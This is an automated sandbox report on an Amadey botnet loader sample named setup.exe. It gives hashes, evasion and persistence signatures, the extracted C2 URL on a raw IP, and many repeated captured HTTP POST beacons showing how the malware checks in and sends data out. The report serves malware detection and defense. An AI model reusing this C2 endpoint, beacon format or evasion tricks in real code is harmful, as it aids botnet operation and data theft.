Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1465704
MD5:eaa443f37443cb7221d63e0891243384
SHA1:d3242326b2ac1ae6e9817a49df33c3a79e209aee
SHA256:bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
Tags:Amadeyexe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • setup.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: EAA443F37443CB7221D63E0891243384)
    • axplong.exe (PID: 7564 cmdline: "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" MD5: EAA443F37443CB7221D63E0891243384)
  • axplong.exe (PID: 7548 cmdline: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe MD5: EAA443F37443CB7221D63E0891243384)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["http://77.91.77.81/Kiru9gu/index.php"]}
SourceRuleDescriptionAuthorStrings
00000001.00000003.1699386717.0000000005530000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000000.00000002.1701798029.0000000000361000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000002.00000002.1740305349.0000000001001000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000002.00000003.1699458271.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            2.2.axplong.exe.1000000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              1.2.axplong.exe.1000000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0.2.setup.exe.360000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  No Sigma rule has matched
                  Timestamp:07/02/24-00:25:04.486423
                  SID:2856147
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: setup.exeAvira: detected
                  Source: http://77.91.77.81/Avira URL Cloud: Label: phishing
                  Source: http://77.91.77.81/Kiru9gu/index.php2Avira URL Cloud: Label: phishing
                  Source: http://77.91.77.81/Kiru9gu/index.phpAvira URL Cloud: Label: malware
                  Source: http://77.91.77.81/Kiru9gu/index.phpm32Avira URL Cloud: Label: phishing
                  Source: http://77.91.77.81/Kiru9gu/index.phpR-Avira URL Cloud: Label: phishing
                  Source: http://77.91.77.81/Kiru9gu/index.phplAvira URL Cloud: Label: phishing
                  Source: http://77.91.77.81/Kiru9gu/index.phpem32Avira URL Cloud: Label: phishing
                  Source: http://77.91.77.81/Kiru9gu/index.phpoSAvira URL Cloud: Label: phishing
                  Source: http://77.91.77.81/Kiru9gu/index.phptIAvira URL Cloud: Label: phishing
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                  Source: axplong.exe.7548.1.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.81/Kiru9gu/index.php"]}
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeReversingLabs: Detection: 72%
                  Source: setup.exeReversingLabs: Detection: 72%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeJoe Sandbox ML: detected
                  Source: setup.exeJoe Sandbox ML: detected
                  Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49730 -> 77.91.77.81:80
                  Source: Malware configuration extractorIPs: 77.91.77.81
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
